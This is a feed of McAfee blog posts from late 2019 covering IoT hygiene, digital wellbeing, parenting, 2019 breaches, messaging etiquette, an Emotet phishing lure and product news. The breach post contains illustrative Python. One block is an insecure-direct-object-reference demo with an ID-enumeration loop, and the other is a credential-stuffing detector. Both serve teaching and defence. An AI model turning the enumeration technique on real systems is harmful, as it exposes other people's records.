  • Practice proper cyber hygiene. From a technical perspective, consumers have many tools at their disposal, even when security concerns do manifest. Implement a strong password policy, put IoT devices on their own, separate, network, utilize dual-factor authentication when possible, minimize redundant systems and patch quickly when issues are found.
  • Do your research. Consumers should ensure they are aware of the security risks associated with products available on the market.

For product manufacturers:

  • Manufacturer supported awareness. Product manufacturers can help by clearly stating the level of security their product provides in comparison with the technology or component they seek to advance.

  • Embrace vulnerability disclosure. Threat actors are constantly tracking flaws which they can weaponize; conversely, threat researchers are constantly working to uncover and secure product vulnerabilities. By partnering with researchers and responding quickly, vendors have a unique opportunity

The post The Tradeoff Between Convenience and Security – A Balancing Act for Consumers and Manufacturers appeared first on McAfee Blogs.

Do You Have Blind Spots? McAfee Welcomes Check Your Blind Spots Bus Tour https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/do-you-have-blind-spots-mcafee-welcomes-check-your-blind-spots-bus-tour/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/do-you-have-blind-spots-mcafee-welcomes-check-your-blind-spots-bus-tour/#respond Mon, 06 Jan 2020 17:53:38 +0000 /blogs/?p=97908

A bus, virtual reality, and conversations around inclusion.

How do all these fit together? The answer: CEO Action’s Check Your Blind Spots Bus Tour.

Working at McAfee means innovating in everything we do – it’s imperative for us to stay a step ahead of cyberattacks. This includes new approaches to challenge thinking about diversity. That’s where CEO Action and Check Your Blind Spots Bus Tour comes in.

In December, McAfee was honored to be among the one hundred stops around the country of an interactive, eye-opening mobile tour that used virtual reality and gaming technology to help us recognize unconscious biases or blind spots.

Inside the Tour Bus

When the tour bus rolled up, McAfee team members lined up to uncover unconscious bias in a new way with immersive gaming technology. Some of the interactive elements included:

  • Wake Up Call: An all-audio experience. Through a wall of ringing phones, McAfee team members picked up a receiver to overhear conversations between landlords, tenants, and potential renters that reveal unintended bias.
  • Look Through a Different Lens: Via gamification and a digital viewfinder, McAfee team members watched an interaction between co-workers setting up a work-related event, then identified the moments when unconscious biases were on display.
  • Face Yourself, Face Reality: In front of a mirror, McAfee team members watched their reflection fade away to reveal a different person staring back at them. Through this touchscreen experience, each new reflection shared a series of biases they had experienced.

McAfee team members share their experience:

Sign the I Act On Pledge

Ready to take action and drive inclusive behaviors in your day-to-day life? Join the hundreds of McAfee employees who signed the I Act On Pledge to do just that.

I pledge to check my bias, speak up for others and show up for all.

Take the pledge.

It’s a new year! Start off strong with a company that’s invested in building an inclusive workplace. Search our openings.

Digital Minimalism: Is It Time to Overhaul Your Relationship with Technology? https://www.mcafee.com/blogs/consumer/family-safety/digital-minimalism-is-it-time-to-overhaul-your-relationship-with-technology/ https://www.mcafee.com/blogs/consumer/family-safety/digital-minimalism-is-it-time-to-overhaul-your-relationship-with-technology/#comments Sat, 04 Jan 2020 15:00:37 +0000 /blogs/?p=97889


The post Digital Minimalism: Is It Time to Overhaul Your Relationship with Technology? appeared first on McAfee Blogs.


Editor’s Note: This is part I of a series on Digital Minimalism in 2020.

When Steve Jobs introduced the iPhone in 2007, he called it the “best iPod ever,” and said it would be a “very cool way” to make calls and listen to music. Little did he know that it would be the catalyst to a future technology tsunami of social networks, apps, and gaming platforms that would come to own our collective attention span.

But here we are. Every day we step into an algorithmic ecosystem that has little to do with our initial desire to connect with friends and have a little fun. We’ve gone from fumbling to find our flip phones to checking our phones 96 times a day, or once every 10 minutes, according to recent research.

We’re getting it

However, with more time and knowledge behind us, parents and consumers are starting to get it.

We now know that companies deliberately engineer our favorite digital destinations to get us hooked. With every “like,” emoji, comment, and share, they have figured out how to tap into the core human motivators of sensation and anticipation, which keep our dopamine levels amped the same way tobacco, gambling, or overeating might.

This evolution of marketing and economics has hit us all hard and fast. But as Maya Angelou famously said, when we know better, we can do better. Stepping into 2020 may be the best time to rethink — and totally reconstruct — our relationship with technology.


Digital Detox vs. Digital Minimalism

We’ve talked a lot about digital detox strategies, which, no doubt, have helped us reduce screen time and unplug more. However, there’s a new approach called digital minimalism that may offer a more long-term, sustainable solution to our tech-life balance.

The difference in approaches is this: A detox implies you will stop for a brief period and then resume activities. Digital minimalism is stopping old habits permanently and reconstructing a new way forward.

Digital minimalism encourages us to take a long, hard, honest look at our relationship with technology, be open to overhauling our ideology, and adopt a “less is more” approach.

Author Cal Newport examines the concept in his book, Digital Minimalism: Choosing a Focused Life in a Noisy World. The approach rests on three principles: a) clutter is costly, b) optimization is important, and c) intentionality is satisfying.

According to Newport, digital minimalism allows us to rebuild our relationship with technology so that it serves us — not the other way around. Here’s the nugget: When you can clearly define and understand your values, you can make better, more confident decisions about what technology you use and when.

Three core principles

• Scrutinize value. Digital clutter is costly. Therefore, it’s critical to examine every piece of technology you allow into your life and weigh it against what it costs you in time, stress, and energy.

Ask yourself: 

What am I genuinely gaining from the time I am spending on this site?
What is being here costing me in terms of money and attention?
What emotions rise (positive, negative) when I’m using this app/site?
Can I perform the same task differently?

• Optimize resources. You don’t have to throw out all your technology to be a digital minimalist. Instead, optimization is determining what digital sources bring you the most value. For example, you may habitually scroll six news sources each day when you only gain value from two. You may have six active social networks you frequent out of obligation or habit when only one actually offers you value and genuine connection.

Ask yourself:

What app/site is the most accurate and valuable to me?
What app/site feeds my emotions, goals, and relationships in a positive, healthy way?
What app/site helps me personally to work more efficiently?

• Align tech with values. The third principle of intentionality is inspired by the Amish way of life and encourages holding every technology decision up against your fundamental values. For instance, if spending time on a specific app doesn’t support your priorities of family and personal health, then that fun, albeit misaligned app does not make the cut. 

Ask yourself:

Does this activity benefit and support my values and what I’m trying to do in my life?
Am I better off without this online activity?

Getting started

  • 30 days of less. For 30 days, cut out all non-essential technology from your life. Use only what is essential to your income and health.
  • Reflect on values. Reflect on the things that are truly important to you and your family. Think about what activities bring you joy and which specific people interest you. If you decide that creating art or volunteering are your central values, ask yourself, “Does this technology support my value of creating art and volunteering?”
  • Increase solitude. Researchers have found a connection between a lack of solitude and the rise in depression and anxiety among digital natives (iGen), a condition they call solitude deprivation. Solitude allows us to process, reflect, and problem-solve. Little by little, begin to increase your time for personal reflection.

While it’s easy to demonize the growing presence and power of technology (smartphones and social media specifically) in family life, it’s also added amazing value and isn’t going anywhere soon. So we do what we can do, which is to stop and examine the way we use technology daily and the amount of control we give it over our time, hearts, and minds. 

Lessons Learned: A Decade of Digital Parenting https://www.mcafee.com/blogs/consumer/family-safety/lessons-learned-a-decade-of-digital-parenting/ https://www.mcafee.com/blogs/consumer/family-safety/lessons-learned-a-decade-of-digital-parenting/#respond Sat, 28 Dec 2019 22:41:12 +0000 /blogs/?p=97871


The post Lessons Learned: A Decade of Digital Parenting appeared first on McAfee Blogs.


Give yourself a high-five, parents. Pour yourself a cup of coffee or your favorite celebratory drink and sip it slow — real slow. Savor the wins. Let go of the misses. Appreciate the lessons learned. You’ve come a long way in the last decade of raising digital kids, and not all of it has been easy.

As we head into 2020, we’re tossing parenting resolutions (hey, it’s a victory to make it through a week let alone a year!). Instead, we’re looking back over the digital terrain we’ve traveled together and lessons learned. Need a refresher? Here’s a glimpse of how technology has impacted the family over the past decade.

In the last decade

• Smartphone, social, gaming growth. Social media and gaming platforms have exploded to usage and influence levels no one could have imagined. Smartphone ownership has climbed steadily, and as of 2019: 81% of adults own a smartphone and 72% use social media, 53% of kids own a smartphone by the age of 11, and 84% of teenagers have phones.

• Video platform growth. Video platforms like YouTube have become the go-to for teens and tweens who spend nearly three hours a day watching videos online.

• Streaming news. Smartphones have made it possible for all of us to carry (and stream) the world in our pockets. In 2018, for the first time, social media sites surpassed print newspapers as a news source for Americans.

• Dating apps dominate. We’re hooking up, dating, and marrying using apps. A Stanford study found that “heterosexual couples are more likely to meet a romantic partner online than through personal contacts and connections.”

• The rise of the Influencer. Internet influencers and celebrities have reached epic levels of fame, wealth, and reach, creating an entire industry of vloggers, gamers, micro and niche-influencers, and others who have become “instafamous.”

• Lexicon changes. Every day, technology is adding terms to our lexicon that didn’t exist a decade ago such as selfie, OMG, streaming, bae, fake news, the cloud, wearables, finsta, influencers, emojis, tracking apps, catfish, digital shaming, screen time, cryptojacking, FOMO, and hashtag, along with hundreds of others.

What we’ve learned (often the hard way)

Most people, if polled, would say technology has improved daily life in incalculable ways. But ask a parent of a child between five and 18 the same question, and the response may not be as enthusiastic. Here are some lessons we’ve learned the hard way.

Connection brings risk. We’ve learned that with unprecedented connection comes equally unprecedented risk. Everyday devices plug our kids directly into the potential for cyberbullying, sexting, inappropriate content, and mental health issues.  Over the past decade, parents, schools, and leaders have worked to address these risks head-on but we have a long way to go in changing the online space into an emotionally safe and healthy place.

Tech addiction isn’t a myth.  To curb the negative impact of increased tech use, we’ve learned ways to balance and limit screen time, unplug, and digitally detox. Most importantly, it’s been confirmed that technology addiction is a medical condition that’s impacting people and families in very painful ways.

The internet remembers. We’ve witnessed the very public consequences of bad digital choices. Kids and adults have wrecked scholarships, reputations, and careers due to careless words or content shared online. Because of these cases, we’re learning — though never fast enough — to think twice about the behaviors and words we share.

We’re equipping vs. protecting. We’ve gone from monitoring our kids aggressively and freaking out over headlines to realizing that we can’t put the internet in a bottle and follow our kids 24/7. We’ve learned that relevant, consistent conversation, adding an extra layer of protection with security software, and taking the time to understand (not just monitor) the ways our kids use new apps, is the best way to equip them for digital life.

The parent-child relationship is #1. When it comes to raising savvy digital kids and keeping them safe, there’s not a monitoring plan in existence that rivals a strong parent-child relationship. If you’ve earned your child’s heart, mind, and respect, you have his or her attention and can equip them daily to make wise choices online.

The dark web is . . . unimaginably dark. The underbelly of the internet — the encrypted, anonymous terrain known as the Dark Web — has moved from covert to mainstream exposure. We’ve learned the hard way the degree of sophistication with which criminals engage in pornography, human trafficking, drug and weapon sales, and stolen data. With more knowledge, the public is taking more precautions especially when it comes to malware, phishing scams, and virus attacks launched through popular public channels.

There’s a lot of good going on. As much negative as we’ve seen and experienced online over the past decade, we’ve also learned that its power can be used equally to amplify the best of humanity. Social media has sparked social movements, helped first responders and brought strangers together in times of tragedy like no other medium in history.

Privacy is (finally) king. Ten years ago, we clicked on every link that came our way and wanted to share every juicy detail about our personal lives. We became publishers and public figures overnight and readily gave away priceless chunks of our privacy. The evolution and onslaught of data breaches, data mining, and malicious scams have educated us to safeguard our data and privacy like gold.

We’ve become content curators. The onslaught of fake news, photo apps, and filter bubbles have left our heads spinning and our allegiances confused. In the process, we’ve learned to be more discerning with the content we consume and share. While we’re not there yet, our collective digital literacy is improving as our understanding of various types of content grows.

Parents have become digital ninjas. The parenting tasks of monitoring, tracking, and keeping up with kids online have gone from daunting to doable for most parents. With the emotional issues now connected to social media, most parents don’t have the option of sitting on the sidelines and have learned to track their kids better than the FBI.

This is us

We’ve learned that for better or worse, this wired life is us. There’s no going back. Where once there may have been doubt a decade ago, today it’s clear we’re connected forever. The internet has become so deep-seated in our culture and homes that unplugging completely for most of us is no longer an option without severe financial (and emotional) consequences. The task ahead for this new decade? To continue working together to diminish the ugly side of technology — the bullying, the cruelty, the crime — and make the internet a safe, fun experience for everyone.

How to Apply the Lessons of 2019 to the Security of 2020 https://www.mcafee.com/blogs/enterprise/endpoint-security/how-to-apply-the-lessons-of-2019-to-the-security-of-2020/ https://www.mcafee.com/blogs/enterprise/endpoint-security/how-to-apply-the-lessons-of-2019-to-the-security-of-2020/#respond Mon, 23 Dec 2019 16:00:22 +0000 /blogs/?p=97865


The post How to Apply the Lessons of 2019 to the Security of 2020 appeared first on McAfee Blogs.


What keeps executives up at night? According to the World Economic Forum’s (WEF) 2019 Executive Opinion Survey, it’s cyberattacks. When reflecting on 2019, it’s clear why that is. From healthcare and insurance to manufacturing and telecommunications, cybercriminals spared no industry from their schemes, with a few key verticals bearing the brunt of this year’s attacks. It comes as no surprise that financial services, insurance, and healthcare were popular targets, given their proximity to sensitive, easily-monetizable data. A little more surprising, however, is the similarities between breaches across industries and organizations. Below, I’ll recap notable incidents from 2019, expand upon their commonalities, and explore a few lessons to learn as we enter a new year.

Different Industries, Same Causes

Although cybersecurity incidents rarely stem from one failure entirely, a few central causes and trends appeared throughout 2019.

Application Misconfiguration

Application misconfigurations were responsible for two of 2019’s most prominent data breaches. In the largest breach of the year, a former AWS employee exploited a misconfigured Web Application Firewall (WAF) to steal the Social Security numbers, bank account numbers, and other sensitive information of more than 100 million Capital One customers and credit card applicants. Because Capital One hosted its data on Amazon’s cloud and the attacker had once worked there, the incident was initially labeled an insider attack. The root cause was more mundane: a server-side request forgery flaw in the WAF let the attacker reach the back-end metadata service that hands out the instance’s temporary access credentials, and the role behind those credentials had been granted far more permissions than a WAF needs, including read access to the customer data. Although the stolen information was most likely neither shared nor used fraudulently, Capital One estimates the incident will cost the company over $300 million.

First American Financial Corporation fell prey to an even simpler misconfiguration in what was less a hack than outright negligence. The company’s online customer portal served documents by a sequential number in the URL and never checked that the requester was entitled to the document, so anyone holding the link to one valid First American document could change that number and read other customers’ files, a classic insecure direct object reference. A staggering 885 million customer financial records going back to 2003 were accessible because of this design defect. And while there is no evidence anyone actually found or stole the information, First American now faces both government investigations and a class-action lawsuit.
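The First American flaw described above is the textbook insecure direct object reference: the portal’s only “access control” was knowing a document number. The Python below is an added example, not First American’s code or any vendor’s; the in-memory document store, the user names and the function names are constructed for illustration. It shows the vulnerable lookup beside a hardened one that checks object ownership, and an enumeration loop of the kind an attacker (or a scanner) would run against each.

```python
"""Insecure direct object reference (IDOR), as in the First American case:
a document is fetched by a sequential ID taken straight from the URL,
so anyone who changes the number reads someone else's record.
Constructed in-memory store and users; no real data."""


# Constructed sample data: each document records which customer owns it.
DOCUMENTS = {
    1001: {"owner": "alice", "body": "Closing statement for 12 Elm St"},
    1002: {"owner": "bob", "body": "Wire instructions for escrow #7731"},
    1003: {"owner": "carol", "body": "Title insurance policy"},
}


class Forbidden(Exception):
    """Raised when the caller is not allowed to read the document."""


def fetch_document_vulnerable(session_user: str, doc_id: int) -> str:
    """The defect: the ID from the URL is trusted as the only access control.
    Who is logged in (if anyone) is irrelevant; the lookup never consults the owner."""
    return DOCUMENTS[doc_id]["body"]


def fetch_document_hardened(session_user: str, doc_id: int) -> str:
    """Object-level authorization: the record must belong to the authenticated
    session, otherwise the request is rejected. The same error is returned for
    'does not exist' and 'not yours' so the endpoint cannot be used to map live IDs."""
    doc = DOCUMENTS.get(doc_id)
    if doc is None or doc["owner"] != session_user:
        raise Forbidden("document not available")
    return doc["body"]


def enumerate_ids(fetch, session_user: str, start: int, stop: int) -> list:
    """Simulate an attacker walking adjacent IDs as the given user.
    Returns the IDs whose contents were served, i.e. the ones that leaked."""
    leaked = []
    for doc_id in range(start, stop):
        try:
            fetch(session_user, doc_id)
            leaked.append(doc_id)
        except (Forbidden, KeyError):
            continue
    return leaked


if __name__ == "__main__":
    # alice walks IDs 1000..1009: the vulnerable endpoint hands over all three
    # documents, the hardened one only her own.
    print("vulnerable:", enumerate_ids(fetch_document_vulnerable, "alice", 1000, 1010))
    print("hardened:  ", enumerate_ids(fetch_document_hardened, "alice", 1000, 1010))
```

Two design points are worth keeping: the hardened version returns one indistinguishable error for “does not exist” and “not yours”, so the endpoint cannot be used to discover which IDs are live; and switching to random, unguessable document IDs is a worthwhile second layer but never a substitute for the ownership check, because links get forwarded, logged and leaked.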

Exploiting Third-Party Access

Organizations must, of course, pay close attention to their own cybersecurity preparation, but in today’s hyperconnected digital world, they must also holistically audit the third parties they interact with. In 2019, both Quest Diagnostics and Sprint failed to conduct this due diligence. Quest, which is among the world’s largest clinical laboratories, exposed the personal information, including credit card numbers and Social Security numbers, of more than 11.9 million patients via a breach that originated at AMCA, an outside billing collections agency. To make matters worse, AMCA did not detect the intrusion for almost a full year, allowing the attacker to slowly drain information belonging to AMCA’s clients and ultimately forcing AMCA’s parent company into bankruptcy. Though Quest escaped such a dramatic fate, it is the subject of both a government investigation and a class-action lawsuit.

Sprint faced a similar scenario this year when hackers accessed customer data through a vulnerability in a Samsung website. Samsung and Sprint are connected digitally so that customers can finance Samsung phones through a carrier deal with Sprint, an arrangement that benefits their customers but also creates another threat vector to defend against. And though the exact nature of Samsung’s vulnerability is unclear, this incident is further evidence that a partner’s weaknesses become your own, and that partners must be chosen, and audited, carefully.

Lack of Appropriate Authentication/Credentials for Sensitive Data

This third trend could apply to nearly every breach in this post, but it is the central cause of at least two significant 2019 cybersecurity incidents. In August of this year, State Farm was hit with a credential stuffing attack, in which attackers take username and password pairs leaked in other data breaches and replay them against a different site’s login page. Because people often reuse the same password across accounts, credential stuffing is an effective tactic, and it was also used in a second hacking of Sprint through its Boost Mobile subsidiary. In that case, an unauthorized person used Boost phone numbers and account PIN codes to break into an unknown number of customer accounts.

Key Actions to Take in 2020 

If cybersecurity is to improve in 2020, these mistakes must be prevented and vulnerabilities like the ones mentioned above must be addressed. That starts with companies having a better understanding of the access controls, technologies, and systems that are currently deployed. With that understanding, they can plug gaps and utilize the technology most appropriate to their situation, helping them to avoid a situation like First American’s, in which data was readily available online without restriction. For many, especially those interfacing with outside vendors, a zero trust model makes sense because it continuously monitors and authenticates access requests. Under zero trust, for example, the Quest Diagnostics hack would have likely been detected within days, not months.

Even without zero trust, however, continuous and automated monitoring is critical. With that in place, security teams are alerted to attacks such as credential stuffing as they occur and can respond before the attacker succeeds. For a more proactive approach, IT security should also implement policies that, for example, rate-limit or lock out repeated login attempts from a single person or IP address, and that require re-authentication to access different applications.
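The credential stuffing attacks against State Farm and Boost Mobile described earlier, and the monitoring and per-IP login policy this paragraph recommends, share one detection signature: a single source trying many different usernames in a short window, with most attempts failing. The Python below is an added example, not McAfee’s or any vendor’s detection logic; the log line format, the thresholds (five distinct accounts, 60% failures, a five-minute window) and the sample log lines are constructed assumptions. It flags the stuffing source and lists the accounts that authenticated successfully from it, which are the credentials that need a forced reset.

```python
"""Credential-stuffing detection over web-server authentication logs (added example).
Signature: one source IP tries many *different* usernames with mostly failures in a
short window. A brute-force of a single account has the opposite shape (one username,
many failures). Log format, thresholds and sample lines are assumptions."""

import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format: "<ISO timestamp> <client ip> login user=<name> result=<ok|fail>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) login user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)

# Constructed sample: 203.0.113.7 works through a leaked credential list (one pair
# still valid); 198.51.100.4 is a legitimate user who mistyped a password once.
SAMPLE_LOG = """\
2019-08-01T10:00:01 203.0.113.7 login user=alice result=fail
2019-08-01T10:00:02 203.0.113.7 login user=bob result=fail
2019-08-01T10:00:02 203.0.113.7 login user=carol result=fail
2019-08-01T10:00:03 203.0.113.7 login user=dave result=ok
2019-08-01T10:00:04 203.0.113.7 login user=erin result=fail
2019-08-01T10:00:05 203.0.113.7 login user=frank result=fail
2019-08-01T10:00:09 198.51.100.4 login user=grace result=fail
2019-08-01T10:00:15 198.51.100.4 login user=grace result=ok
"""


def parse(log_text):
    """Yield (timestamp, ip, user, result) tuples; lines that do not match are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield (datetime.fromisoformat(m["ts"]), m["ip"], m["user"], m["result"])


def detect_stuffing(log_text, window=timedelta(minutes=5), min_users=5, min_fail_ratio=0.6):
    """Return {ip: {"users": n, "attempts": n, "failures": n}} for every source IP
    whose attempts inside some sliding window touch >= min_users distinct accounts
    with a failure ratio >= min_fail_ratio. The widest matching window is kept."""
    by_ip = defaultdict(list)
    for ts, ip, user, result in parse(log_text):
        by_ip[ip].append((ts, user, result))

    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # advance the window start until the span fits inside `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            span = events[start:end + 1]
            users = {u for _, u, _ in span}
            failures = sum(1 for _, _, r in span if r == "fail")
            if len(users) >= min_users and failures / len(span) >= min_fail_ratio:
                if ip not in flagged or len(span) > flagged[ip]["attempts"]:
                    flagged[ip] = {"users": len(users), "attempts": len(span), "failures": failures}
    return flagged


def successful_logins_from(log_text, flagged_ips):
    """Accounts that authenticated successfully from a flagged source: these pairs
    were valid in the leaked list and need a forced password reset, not just a block."""
    return sorted({u for _, ip, u, r in parse(log_text) if ip in flagged_ips and r == "ok"})


if __name__ == "__main__":
    hits = detect_stuffing(SAMPLE_LOG)
    print("flagged sources:", hits)
    print("accounts to reset:", successful_logins_from(SAMPLE_LOG, set(hits)))
```

Real campaigns spread attempts across thousands of IPs precisely to stay under per-IP thresholds, so the same window logic should also be run keyed on other attributes (user agent, ASN) and on the site-wide rate of distinct usernames per minute, with thresholds tuned against a baseline of normal traffic rather than the constants used here.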

In addition to auditing themselves and taking the actions described above, organizations must also audit the security controls of their partners to ensure they deploy layers of control and multi-protocol defenses. This means that they have overlapping layers of defense—for example, continuous monitoring and multi-factor authentication—that create redundancy and depth across their environment.

Ultimately, the goal is to act immediately upon security alerts—no matter where they stem from—in order to contain and remediate threats in a timely manner. That means visibility and integration are critical to avoid delays from validating alerts and pivoting between disparate tools. When McAfee MVISION EDR, for example, finds a threat using its artificial intelligence-driven detection capabilities, it immediately elevates an alert to all systems and individuals involved, not just McAfee-built technology. Similarly, MVISION Cloud leverages machine learning to identify suspicious behavior and access requests. This type of automated detection, investigation, and notification could easily be the difference between an isolated breach remediated in hours and a system-wide catastrophe spread over several weeks or months.

For more information on effective endpoint security strategies, follow us at @McAfee and @McAfee_Business and visit our blog for the most relevant information and trends.
10 Thoughtful (Free) Holiday Gifts to Give Your Digital Friends Year ‘Round https://www.mcafee.com/blogs/consumer/family-safety/10-thoughtful-free-gifts-to-give-your-friends-online-year-round/ https://www.mcafee.com/blogs/consumer/family-safety/10-thoughtful-free-gifts-to-give-your-friends-online-year-round/#comments Sat, 21 Dec 2019 15:00:24 +0000 /blogs/?p=97827


The post 10 Thoughtful (Free) Holiday Gifts to Give Your Digital Friends Year ‘Round appeared first on McAfee Blogs.


Just a quick poll. What feelings do these digital scenarios evoke: being ghosted, getting trapped in a group text, being left on ‘read,’ or someone blowing up your phone with a million messages?

Did you cringe a little or drop your phone like a hot potato? You wouldn’t be alone. A lot of people (this writer included) make these communication faux pas every day without even realizing it.

To make this season a little more merry and bright, Facebook Messenger recently teamed up with Debrett’s, the authority on modern etiquette, to develop the first formal guide to the etiquette of digital messaging. Based on consumer research, the guide applies to chatting with friends, family, co-workers, or love interests.

So, to stay off everyone’s naughty list this year, take a minute to review timeless ways to be more courteous and considerate when texting, emailing or messaging. We’ve paraphrased the guide below but recommend you download the full guide here.

10 messaging etiquette tips

  1. Hone your tone. Keep the tone of your messages upbeat and neutral – avoid using sarcasm or irony unless you are confident the other person will get the joke. Include a positive symbol or affectionate emoji to make it clear the joke is well-intended.
  2. Keep it concise… but not too concise. Stick to a few sentences. Long paragraphs of text are overwhelming and put the burden on the other person to respond in kind. On the other hand, consistently sending one-word messages or a single emoji looks curt and implies that you’re too busy or uninterested.
  3. Don’t multi-message. Don’t send four or five messages (blow up someone’s phone) if one will do. Multiple notifications can be distracting. Likewise, in a group chat, sending several messages at a time can appear domineering and confuse the others in the chat.
  4. Share with care. Don’t forward a message unless the original sender has given permission. If in doubt, ask first. Equally, refrain from broadcasting other people’s private information on a group chat.
  5. Know your audience. Invited to a group chat? Be sure to check who else is involved before sending a message. Failing to familiarize yourself with who is in the chat could be trouble. Start a separate message exchange if you need to make individual arrangements – spare the group the additional details and alerts.
  6. Don’t leave them hanging. If a member of your group chat has sent a message without receiving a reply, alleviate their awkwardness with a response – even if only to ‘like’ their message or say that you don’t know the answer.
  7. Abide by the quick reply. As a recipient, it’s polite to reply promptly to messages. Busy? If it’s not urgent, leave it unread until you can respond. Alternatively, turn on push notifications so you can preview the message without letting the other person know it has been seen. As the sender, unless a message is urgent, wait at least a day before nudging someone for a reply.
  8. Give up ghosting. If you’ve lost interest in a conversation, don’t abruptly cut off all contact — or ghost — someone. Ignoring someone’s messages leads to anxiety and uncertainty for the sender. If you want to end an interaction, do so openly but gently, with a brief, polite explanation. If you have been dating or have known someone a while, give them a call or let them know in person.
  9. Practice good exit-quette. Too many food photos and wedding prep updates on your group text? Don’t just drop off. Offer a brief explanation, keeping as close to the truth as possible: ‘Hi guys, I’m on deadline and need a break from my phone to get some work done!’ Another option is to mute the conversation.
  10. Sign off in style. Don’t underestimate the value of closing out a conversation. If you’re switching gears to another activity, it’s best to let the other person know, even if it’s a simple, “be right back.”

A final, personal note on digital etiquette. Billions of people congregate online every day. Billions. A lot of beautiful words, ideas, and connections transpire every minute alongside missteps and hurtful offenses. That said, it’s Christmas. If you’ve been on the sending or receiving side of a digital fallout over the years, consider extending some grace. Reconnect. Apologize. Forgive. No one’s getting it right all the time online, but we’re all getting better, and that’s something to celebrate.

Don’t RSVP to This Holiday Party: Protect Yourself From the Emotet Trojan https://www.mcafee.com/blogs/consumer/consumer-threat-notices/christmas-emotet-trojan/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/christmas-emotet-trojan/#respond Fri, 20 Dec 2019 17:45:14 +0000 /blogs/?p=97852


The post Don’t RSVP to This Holiday Party: Protect Yourself From the Emotet Trojan appeared first on McAfee Blogs.


The holiday season is officially among us. From last-minute holiday shopping to attending countless parties, this time of year keeps users busy. The holiday season is an especially busy time for cybercriminals as well. According to Bleeping Computer, the cybercriminals behind the Emotet trojan have been targeting users with a new spam campaign that impersonates a Christmas party invitation.

How exactly have malicious actors been trying to put a damper on the holiday fun? They’ve crafted phony invites with a subject line such as “Christmas party next week.” The invitation asks recipients to wear their ugliest Christmas sweaters and to view an attached party menu, and the attached documents are named to match: “Christmas party.doc” or “Party menu.doc.” When a user opens one of these Word documents, it prompts them to click ‘Enable Editing’ or ‘Enable Content’ to view it. That button is the trap: enabling the content runs the document’s macros, which download and install the Emotet trojan. Once Emotet is on the device, it can be used for further attacks, such as sending more spam from the victim’s mailbox, downloading the TrickBot banking trojan to steal credentials and financial data, and ultimately dropping ransomware as a final stocking stuffer.

So, what can users do to avoid this unwanted grinch from stealing their Christmas? Check out these tips to protect your security:

  • Click with caution. Only click on links and open attachments from trusted sources. If you receive an email or text message from an unknown sender asking you to click on a suspicious link or open a file, stay cautious and avoid interacting with the message altogether.
  • Don’t enable content. A document that insists you click ‘Enable Editing’ or ‘Enable Content’ before it will display anything is a red flag: that button runs the macro that installs the malware. If you weren’t expecting the attachment, delete it.
  • Use comprehensive security. Whether you’re using a mobile app to check emails on your phone or browsing the internet on your desktop, it’s important to safeguard all of your devices with an extra layer of security. Use robust security software like McAfee Total Protection so you can connect with confidence.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Don’t RSVP to This Holiday Party: Protect Yourself From the Emotet Trojan appeared first on McAfee Blogs.

New Version of App Control Revving Up https://www.mcafee.com/blogs/other-blogs/executive-perspectives/new-version-of-app-control-revving-up/ https://www.mcafee.com/blogs/other-blogs/executive-perspectives/new-version-of-app-control-revving-up/#respond Fri, 20 Dec 2019 16:00:02 +0000 /blogs/?p=97841

As a leader in the Department of Homeland Security’s (DHS) Continuous Diagnostics and Mitigation (CDM) program, McAfee is constantly innovating to meet and exceed the security needs of the federal government. Federal agencies count on McAfee to secure their networks and systems, from device to the cloud, and we’re always anticipating and preparing today for tomorrow’s needs.

That’s why McAfee is launching an updated version of Application Control.  Application Control is a critical component of the CDM program that fulfills two core functions as defined in the Software Asset Management (SWAM) capability requirements: Application Whitelisting and the timely delivery of an agency’s complete software inventory.

Application Control is an endpoint technology that prevents attacks by blocking the execution of unauthorized applications. The whitelisting program will scan the system for executables, applications, libraries, drivers, and scripts to classify them as well-known, unknown, or known-bad applications. Using whitelisting prevents attacks from unknown malware by allowing only known-good whitelisted applications to run.

The latest iteration of McAfee’s Application Control includes enhanced features and functionality for the centrally managed Software Inventory Mode, Common Platform Enumeration (CPE) Reporting, and Local User support, while also maintaining the basic proactive security functions that provide a safe environment from unknown and future threats.

The primary function of the new Inventory Mode in Application Control is to provide visibility of an enterprise’s installed software in a monitoring-only capacity: nothing is blocked, but the endpoint continuously updates its centrally managed software inventory, so accurate information is available for ingestion into the CDM dashboard. In Inventory Mode, an initial solidification pass builds the inventory, which is then sent to the McAfee ePO server; after that, only differential updates are sent, keeping the centrally managed inventory consistent and current.

Another new feature of Application Control is the introduction of Common Platform Enumeration (CPE) reporting. CPE is a standardized method of describing and identifying classes of applications, operating systems, and hardware devices present among an enterprise’s computing assets. There are three dictionary types of CPE: official dictionary, custom dictionary, and managed custom dictionary, which all provide support for applications in custom environments. This feature will serve as a repeatable and accurate method for identifying software installed on an agency’s physical and virtual assets.

The final upgrade to Application Control is Local User Support. This capability reduces administrative overhead for on-site administrators by letting them make changes directly on a protected endpoint. For example, an administrator can be added as a trusted user, allowing them to install or update software on that system.

As a champion of the CDM program, McAfee understands the importance of continuously modernizing our solutions, staying ahead of the changing threat landscape and evolving needs of our agency partners.  Incorporating the new version of Application Control with the rest of our product suite is an important step that agencies can take to holistically secure their enterprise network while simultaneously achieving the goals of the CDM program. We are excited about the new features in Application Control and the benefits participating CDM agencies can achieve with McAfee.

 

Here’s How the California Consumer Privacy Act Will Affect You https://www.mcafee.com/blogs/consumer/california-consumer-privacy-act-2020/ https://www.mcafee.com/blogs/consumer/california-consumer-privacy-act-2020/#comments Thu, 19 Dec 2019 17:41:38 +0000 /blogs/?p=97820

On May 25, 2018, the European Union began enforcing a new privacy law, the General Data Protection Regulation (GDPR), which gives EU citizens more control over their data in today’s hyper-connected world. In June 2018, California responded with its own bill, the California Consumer Privacy Act (CCPA). The law, which takes effect in January 2020, broadens the privacy rights of Californians, including data access rights and a limited private right of action. Essentially, the CCPA gives users the right to know just how companies are making money off of their data.

